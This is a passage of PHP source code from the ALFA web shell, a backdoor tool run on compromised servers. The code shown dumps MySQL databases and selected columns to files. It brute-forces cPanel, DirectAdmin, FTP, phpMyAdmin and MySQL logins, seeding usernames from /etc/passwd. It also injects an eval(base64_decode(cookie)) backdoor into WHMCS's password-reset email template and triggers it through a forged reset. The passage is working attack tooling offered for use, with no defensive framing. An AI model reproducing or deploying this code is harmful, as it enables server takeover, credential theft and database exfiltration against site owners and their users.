'"><p><input type="submit" name="btn" value=" "></p></form></center>';
            if ($_POST['alfa5'] == '>>') {
                echo __pre();
                if (!empty($_POST['alfa3'])) {
                    $protect = $_POST['alfa1'];
                    $lgpage = $_POST['alfa2'];
                    $username = $_POST['alfa3'];
                    $password = md5($_POST['alfa4']);
                    $icon = $_POST['alfa6'];
                    $post_encrypt = $_POST['alfa7'];
                    $cgi_api_val = $_POST['alfa9'];
                    @chdir($GLOBALS['home_cwd']);
                    $basename = @basename($_SERVER['PHP_SELF']);
                    $data = @file_get_contents($basename);
                    $user_rand = $GLOBALS["DB_NAME"]["user_rand"];
                    $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
                    $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
                    $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
                    $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
                    $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
                    $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
                    $find_user = '/\'' . $user_rand . '\'(.*?),/i';
                    $find_pw = '/\'' . $pass_rand . '\'(.*?),/i';
                    $find_lg = '/\'' . $login_page_rand . '\'(.*?),/i';
                    $find_p = '/\'' . $safemode_rand . '\'(.*?),/i';
                    $icons = '/\'' . $show_icons_rand . '\'(.*?),/i';
                    $postEnc = '/\'' . $post_encryption_rand . '\'(.*?),/i';
                    $cgi_api_reg = '/\'' . $cgi_api_rand . '\'(.*?),/i';
                    if (!empty($username) && preg_match($find_user, $data, $e)) {
                        $new = '\'' . $user_rand . '\' => \'' . $username . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($_POST['alfa4']) && preg_match($find_pw, $data, $e)) {
                        $new = '\'' . $pass_rand . '\' => \'' . $password . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($lgpage) && preg_match($find_lg, $data, $e)) {
                        $new = '\'' . $login_page_rand . '\' => \'' . $lgpage . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($find_p) && preg_match($find_p, $data, $e)) {
                        $new = '\'' . $safemode_rand . '\' => \'' . $protect . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($icons, $data, $e)) {
                        $new = '\'' . $show_icons_rand . '\' => \'' . $icon . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($postEnc, $data, $e)) {
                        $new = '\'' . $post_encryption_rand . '\' => ' . $post_encrypt . ',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($cgi_api_reg, $data, $e)) {
                        $new = '\'' . $cgi_api_rand . '\' => ' . $cgi_api_val . ',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (@file_put_contents($basename, $data)) {
                        echo '<b>UserName: </b><font color="green"><b>' . $username . '</b></font><br /><b>Password: </b><font color="green"><b>' . $_POST['alfa4'] . '</b></font><script>post_encryption_mode = ' . $post_encrypt . ';</script>';
                    } else {
                        __alert("<span style='color:red;'>File has no edit access...!</span>");
                    }
                } else {
                    __alert("<span style='color:red;'>UserName is Empty !</span>");
                }
            }
        } elseif ($_POST["alfa8"] == "color") {
            echo "<center><p><div class=\"txtfont_header\">| Custom Color |</div></p><form onSubmit=\"reloadColors();return false;\" method='post'>";
            echo "<table border=\"1\"><tbody>";
            $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
            $x = 1;
            foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
                $multi = "";
                if (is_array($value)) {
                    if (isset($value["multi_selector"])) {
                        $multi = __ZW5jb2Rlcg(json_encode($value));
                    }
                }
                $value = alfa_getColor($key);
                $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
                echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
            }
            echo "<tr><td style=\"text-align:center;\">-</td><td style=\"text-align:center;\"><div class=\"tbltxt\">*</div></td><td><div style=\"margin-left:5px;\" class=\"tbltxt\">Use Default Color:</div></td><td></td><td><center><input type=\"checkbox\" id=\"use_default_color\" value=\"1\"></center></td></tr>";
            echo "</tbody></table><p><input type=\"submit\" name=\"btn\" value=\" \"></p></form><p><button style=\"padding:4px;;margin-right:20px;\" onclick=\"\$('importFileBtn').click();\" class=\"button\"> Import </button> <button style=\"padding:4px;margin-left:20px;\" onclick=\"g('settings',null,null,null,null,null,null,null,'export','color')\" class=\"button\"> Export </button></center></p>";
            if ($_POST['alfa7'] == 'export') {
                echo __pre();
                $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array();
                $glob_colors = $GLOBALS["__ALFA_COLOR__"];
                $array = array();
                foreach ($glob_colors as $k => $v) {
                    if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                        $v = trim($colors[$k]);
                    } else {
                        $v = trim(is_array($v) ? $v["key_color"] : $v);
                    }
                    $array[$k] = $v;
                }
                $file = "alfa_color_config_" . date('Y-m-d-h_i_s') . ".conf";
                $config = json_encode($array, JSON_PRETTY_PRINT);
                if (!@file_put_contents($file, $config)) {
                    echo '<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">' . $config . '</textarea></center></p>';
                } else {
                    echo '<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $file . '\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>';
                }
            }
            if ($_POST['alfa2'] == '>>') {
                echo __pre();
                $colors = json_decode($_POST["alfa1"], true);
                $array = "";
                $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false;
                $glob_colors = $GLOBALS["__ALFA_COLOR__"];
                foreach ($glob_colors as $k => $v) {
                    if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                        $v = trim($colors[$k]);
                    } else {
                        $v = trim(is_array($v) ? $v["key_color"] : $v);
                    }
                    $array .= '"' . trim($k) . '" => "' . $v . '",';
                }
                @chdir($GLOBALS['home_cwd']);
                $basename = @basename($_SERVER['PHP_SELF']);
                $data = @file_get_contents($basename);
                $color = '/\'color\'(.*?)\\),/s';
                if (preg_match($color, $data, $e)) {
                    $new = "'color' => array(" . $array . "),";
                    $data = str_replace($e[0], $new, $data);
                    if (@file_put_contents($basename, $data)) {
                        echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>";
                    } else {
                        echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>";
                    }
                } else {
                    echo "<center><p><h3>[-] Error...!</h3></p></center>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaaboutus()
    {
        alfahead();
        echo "<div class=\"header\">";
        $news = new AlfaCURL();
        $about_us = $news->Send("http://solevisible.com/aboutus.php");
        if (empty($about_us)) {
            $about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>\r\n<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>\r\n<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\r\n<font color='#00A220'>Contact : solevisible@gmail.com</font><br>\r\n<font color='#00A220'>Telegram Channel: @solevisible</font><br>\r\n<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>\r\n<font color='#FFFFFF'>Skype : sole.sad</font><br>\r\n<font color='#FF0000'>Persian Gulf For Ever</font><br>\r\n<font color='#FF0000'>Iranian Programmers</font><br>\r\n<font color='#FF0000'>############</font><br>\r\n</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
        }
        echo __pre() . $about_us;
        echo "</div>";
        alfafooter();
    }
    function alfacoldumper()
    {
        alfahead();
        echo "<div class=\"header\">";
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if(\$('dumper-delimiter-type').value == 'delimiter')delimiter=\$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
        $delimiter = !empty($_POST['alfa1']) ? $_POST['alfa1'] : '::';
        $selected_data = json_decode($_POST['alfa2'], true);
        $username = $_POST['alfa3'];
        $password = $_POST['alfa4'];
        $dbname = $_POST['alfa5'];
        $dfile = $_POST['alfa6'];
        $host = $_POST['alfa7'];
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50'));
        create_table($table);
        echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
        $db = false;
        if (!empty($dbname)) {
            $db = @mysqli_connect($host, $username, $password, $dbname);
        }
        if (count($selected_data) > 0) {
            if ($db) {
                if (!is_dir($dfile)) {
                    $dfile = $GLOBALS['cwd'];
                }
                $tbls = "";
                $ext = '.txt';
                if ($delimiter == 'json') {
                    $ext = '.json';
                }
                foreach ($selected_data as $tbl => $cols) {
                    $tables_query = mysqli_query($db, "SELECT " . implode(',', $cols) . " FROM {$tbl}");
                    $file_name = $dfile . '/' . $dbname . '.' . $tbl . $ext;
                    $fp = fopen($file_name, "w");
                    $data = array();
                    while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
                        if ($delimiter == "json") {
                            $col_arr = array();
                            foreach ($row as $key => $value) {
                                if (empty($value)) {
                                    $value = "[empty]";
                                }
                                $col_arr[$key] = $value;
                            }
                            $data[$tbl][] = $col_arr;
                        } else {
                            $data = "";
                            foreach ($row as $key => $value) {
                                if (empty($value)) {
                                    $value = "[empty]";
                                }
                                $data .= $value . $delimiter;
                            }
                            fwrite($fp, $data . "\n");
                        }
                    }
                    if ($delimiter == "json") {
                        fwrite($fp, json_encode($data));
                    }
                    fclose($fp);
                    $tbls .= "Done ~~~> " . $file_name . "<br>";
                }
                echo __pre();
                echo "<center><font color='#00FF00'>" . $tbls . "</font></center>";
            }
        }
        if (!empty($dbname) && count($selected_data) == 0) {
            //echo __pre();
            if ($db) {
                echo "<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>";
                echo "<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>";
                $data = array();
                $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
                while ($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)) {
                    $data[$row["table_name"]] = array();
                    $table_count_q = mysqli_query($db, "SELECT count(*) FROM `" . $row['table_name'] . "`");
                    $table_count = mysqli_fetch_row($table_count_q);
                    $data[$row["table_name"]]["data_count"] = $table_count[0];
                    $columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = '" . $row['table_name'] . "'");
                    while ($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
                        $data[$row["table_name"]]["cols"][] = $row2["column_name"];
                    }
                }
                mysqli_close($db);
                echo "<ul id=\"myUL\">";
                foreach ($data as $tbl => $cols) {
                    echo '<li><span style="color:#00FF00;" class="box">' . $tbl . ' (' . $cols["data_count"] . ')</span><ul class="nested">';
                    foreach ($cols["cols"] as $col) {
                        echo '<li tbl="' . $tbl . '"><span style="color:#00FF00;" tbl="' . $tbl . '" class="box sub-box">' . $col . '</span></li>';
                    }
                    echo "</ul></li>";
                }
                echo "</ul>";
            } else {
                echo "<center>mysqli_connect : Error!</center>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaDumper()
    {
        alfahead();
        echo "<div class=\"header\">";
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']) . 'alfa.sql', 'inputSize' => '50'));
        create_table($table);
        echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
        $username = $_POST['alfa3'];
        $password = $_POST['alfa4'];
        $dbname = $_POST['alfa5'];
        $dfile = $_POST['alfa6'];
        $host = $_POST['alfa7'];
        if (!empty($dbname)) {
            echo __pre();
            $msg = "<center>Check this :  <font color='red'>" . $dfile . "</font></center>";
            if (@mysqli_connect($host, $username, $password, $dbname)) {
                if (strlen(alfaEx("mysqldump")) > 0) {
                    alfaEx("mysqldump --single-transaction --host=\"{$host}\" --user=\"{$username}\" --password=\"{$password}\" {$dbname} > '" . addslashes($dfile) . "'");
                    echo $msg;
                } else {
                    __alert("Error...!");
                }
            } else {
                echo "<center>mysqli_connect : Error!</center>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function Alfa_DirectAdmin_Cracker($info)
    {
        if (!$info['mysql']) {
            $url = $info['protocol'] . $info['target'] . ':' . $info['port'] . '/CMD_LOGIN';
        } else {
            $url = $info['protocol'] . $info['target'] . '/phpmyadmin';
        }
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_USERPWD, $info['username'] . ':' . $info['password']);
        if ($info['mysql']) {
            curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
        }
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/CMD_FILE_MANAGER|frameset/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_CP_Cracker($info)
    {
        $url = $info['protocol'] . $info['target'] . ':' . $info['port'];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl, CURLOPT_HEADER, 0);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'] . ":" . $info['password']) . "\n\r"));
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/filemanager/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_FTP_Cracker($info)
    {
        $url = $info['protocol'] . $info['target'];
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_USERPWD, "" . $info['username'] . ":" . $info['password'] . "");
        $result = @curl_exec($curl);
        $curl_errno = curl_errno($curl);
        $curl_error = curl_error($curl);
        if ($curl_errno > 0) {
            echo "<font color='red'>Error: {$curl_error}</font><br>";
        } elseif (preg_match('/(\\d+):(\\d+)/i', $result)) {
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
            $info['target'] = $url;
            CrackerResualt($info);
        }
        curl_close($curl);
    }
    function Alfa_Mysql_Cracker($info)
    {
        if (@mysqli_connect($info['target'] . ':' . $info['port'], $info['username'], $info['password'])) {
            CrackerResualt($info);
            echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
        }
    }
    function Alfa_FTPC($info)
    {
        if ($con = @ftp_connect($info['target'], $info['port'])) {
            if ($con) {
                $login = @ftp_login($con, $info['username'], $info['password']);
                if ($login) {
                    CrackerResualt($info);
                }
            }
        }
        @ftp_close($con);
    }
    function CrackerResualt($info)
    {
        $res = $info['target'] . ' => ' . $info['username'] . ":" . $info['password'] . "\n";
        $c = @fopen($info['fcrack'], 'a+');
        @fwrite($c, $res);
        @fclose($c);
    }
    function Alfa_Call_Function_Cracker($method, $info)
    {
        switch ($method) {
            case 'cp':
                return Alfa_CP_Cracker($info);
            case 'direct':
            case 'phpmyadmin':
                return Alfa_DirectAdmin_Cracker($info);
            case 'ftp':
                return Alfa_FTP_Cracker($info);
            case 'mysql':
                return Alfa_Mysql_Cracker($info);
            case 'mysql':
                return Alfa_FTPC($info);
        }
    }
    function alfaCrackers()
    {
        alfahead();
        AlfaNum(9, 10);
        echo "<div class=\"header\"><center><br><div class=\"txtfont_header\">| Brute Forcer |</div><br><br><form method=\"post\" onsubmit=\"g('Crackers',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,'start',this.protocol.value,this.loginpanel.value);return false;\"><div class=\"txtfont\">Login Page: <select onclick=\"dis_input(this.value);\" name=\"loginpanel\">";
        foreach (array('cp' => 'Cpanel', 'direct' => 'DirectAdmin', 'ftp' => 'FTP', 'phpmyadmin' => 'PhpMyAdmin[DirectAdmin]', 'mysql' => 'mysql_connect()', 'ftpc' => 'ftp_connect()') as $key => $val) {
            echo '<option value="' . $key . '">' . $val . '</option>';
        }
        echo "</select> Protocol: <select id=\"protocol\" name=\"protocol\">";
        foreach (array('https://', 'http://', 'ftp://') as $val) {
            echo '<option value="' . $val . '">' . $val . '</option>';
        }
        echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">' . ($GLOBALS['sys'] == 'unix' ? alfaEx("cut -d: -f1 /etc/passwd") : "") . '</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
        $target = str_replace(array('https://', 'http://', 'ftp://'), '', $_POST['alfa1']);
        $port = $_POST['alfa2'];
        $usernames = $_POST['alfa3'];
        $passwords = $_POST['alfa4'];
        $fcrack = $_POST['alfa5'];
        $cracking = $_POST['alfa6'];
        $protocol = $_POST['alfa7'];
        $loginpanel = $_POST['alfa8'];
        $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
        if ($cracking == 'start') {
            echo __pre();
            $exuser = explode("\n", $usernames);
            $expw = explode("\n", $passwords);
            foreach ($exuser as $user) {
                foreach ($expw as $pw) {
                    $array = array('username' => trim($user), 'password' => trim($pw), 'port' => trim($port), 'target' => trim($target), 'protocol' => trim($protocol), 'fcrack' => trim($fcrack), 'mysql' => $p);
                    Alfa_Call_Function_Cracker($loginpanel, $array);
                }
            }
            echo "<br><font color=\"red\">Attack Finished...</font>";
        }
        echo "</div>";
        alfafooter();
    }
    function output($string)
    {
        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>";
    }
    function alfaShellInjectors()
    {
        alfahead();
        echo "<div class=header>";
        AlfaNum(11);
        echo "<center><p><div class=\"txtfont_header\">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,'whmcs',null)\">| WHMCS | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,'mybb')\">| MyBB | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,null,'vb')\">| vBulletin |</a></h3></center>";
        $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'whmcs') {
            AlfaNum();
            echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml('whmcs') . "</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
            create_table($table);
            echo "<p><div class=\"txtfont\">Shell Inject Method : </div> <select name=\"method\" style=\"width:100px;\"><option value=\"auto\">AutoMatic</option><option value=\"man\">Manuel</option></select></p>";
            echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
            if (isset($_POST['alfa6'])) {
                $dbu = $_POST['alfa6'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $path = $_POST['alfa10'];
                $method = $_POST['alfa4'];
                $index = "{php}ALFA_UPLOADER;{/php}";
                $newin = "{php}ALFA_UPLOADER;{/php}";
                $newindex = "<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}";
                if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                    if (filter_var($path, FILTER_VALIDATE_URL)) {
                        $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_connect_error());
                        $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                        $soleGet = mysqli_fetch_assoc($soleSave);
                        $tempSave1 = $soleGet['message'];
                        $tempSave = str_replace("'", "\\'", $tempSave1);
                        mysqli_query($conn, "UPDATE tblconfiguration SET value = '1' WHERE setting = 'AllowSmartyPhpTags'") or die(mysqli_error($conn));
                        $inject = "UPDATE tblemailtemplates SET message='<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}' WHERE name='Password Reset Validation'";
                        $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                        $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                        $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn));
                        if (function_exists('curl_version') && $method == 'auto') {
                            $AlfaSole = new AlfaCURL(true);
                            $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                            $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                            $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                            $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                            $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                            __alert("shell injectet...");
                            $ff = 'http://' . $path . "/solevisible.php";
                            output($ff);
                        } else {
                            echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>";
                        }
                    } else {
                        __alert('Path is not Valid...');
                    }
                }
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
            AlfaNum(1, 2, 3, 5);
            echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>\r\n";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => 'mybb_', 'inputSize' => '50'));
            create_table($table);
            echo $selector;
            echo "<p><input type=submit value=' '></p></form></center></center>";
            if (isset($_POST['alfa6'])) {
                $dbu = $_POST['alfa6'];
                $dbn = $_POST['alfa7'];
                $dbp = $_POST['alfa8'];
                $dbh = $_POST['alfa9'];
                $prefix = $_POST['alfa10'];
                $method = $_POST['alfa4'];
